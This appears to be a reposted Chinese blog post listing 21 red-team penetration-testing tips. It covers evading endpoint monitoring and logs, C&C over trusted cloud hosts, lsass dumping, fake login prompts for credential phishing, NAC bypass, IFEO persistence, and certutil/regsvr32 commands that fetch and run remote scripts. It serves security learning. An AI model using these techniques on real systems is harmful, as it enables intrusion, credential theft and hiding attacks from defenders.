我收集了一些渗透测试 tips ,同时欢迎大家补充。
1. 使用高知名度的网站(如: Google , aws )做 C&C 控制服务器,这样 可以绕过白名单限制 ;
2. 使用cleanwipe删除文件 ,因为它不需要管理员权限;
(工具见: https://support.symantec.com/en_US/article.HOWTO124983.html )
3. 扫描所有的内网网段 ( 192.168.0.0/16,172.16.0.0/12,10.0.0.0/8), 而不是你所在的内网网段,你可能会发现一些被遗忘的网络或主机;
4. 使用 net user /dom 代替 net user /domain ,因为 net user /domain 关键词 有可能被终端安全软件监控着;
5. 使用 wmiexec 代替 psexec ,因为 wmiexec 留下更好的日志记录;
6. 在 Windows 下,如果你想上传文件到磁盘,请使用 Invoke-ADSBackdoor.ps1 ( https://github.com/samratashok/nishang/blob/master/Backdoors/Invoke-ADSBackdoor.ps1 )这个脚本。
7. 如果你有一个 windows 低权限的 shell ,你可以使用 fake login prompt ( https://github.com/enigma0x3/Invoke-LoginPrompt/blob/master/Invoke-LoginPrompt.ps1 )来 钓鱼获取帐号密码 ;
8. 如果你不想在肉鸡里使用 mimikatz 获取明文密码, 你可以把lsass dump下来,拷贝在本地进行分析 ;
9. 使用 ssh -l username target -T 登陆 ssh ,这样可以 避免被wtmp记录 ;
10. 在退出 ssh 时候,使用 kill -9 $$ , 这样不会在 bash history 中留下日志;
11. 在联网时,如果你发现你被 NAC 屏蔽了,你可以监听广播收集 mac 地址,然后使用打印机的 mac 地址接入网络;
12. 隐藏自己真实目的,可以用 nessus , netsparker 等扫描外网,或小量 Dos/DDos 攻击外网 IP ,这样迷惑蓝队;
13. 使用 ROPEMAKER 和 CVE-2017-0199 进行邮件钓鱼;( ROPEMAKER 开心就好了)
14. 可以使用 certutil.exe 下载文件,使用方法为: certutil -urlcache -split -f <url> <out_filename> ;
15. 可以使用 regsrv32 /s /u dll_name 执行我们的 dll ;
16. 可以使用 regsvr32 /s /n /u /i:<url> scrobj.dll 加载执行远程的脚本;
17. 网络钓鱼中,我们可以利用 smtp relay ;
18. 你可以用目标的主机名作为密码来加密你的 payload 或者 word 宏;
19. 你可以用 HKLMSoftwareMicrosoftWindows NTCurrentVersionImage File Execution Options 的 Debugger 值来保持权限;
20. 在使用自动化扫描 工具 时, 你需要限制连接数,避免网络丢包或者IP被封;
21. 可以使用 certreq.exe 进行 Windows 的数据隐蔽窃取;
以上就是本文的全部内容,希望本文的内容对大家的学习或者工作能带来一定的帮助,也希望大家多多支持 码农网
猜你喜欢:- 渗透测试实战第三版(红队版)
- 红队后渗透测试中的文件传输技巧
- 红队后渗透测试中的文件传输技巧
- 红队渗透测试之使用 OpenSSL 反弹加密 shell
- 红队战术:流程监控技术
- 红队PostgreSQL攻击教程
本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。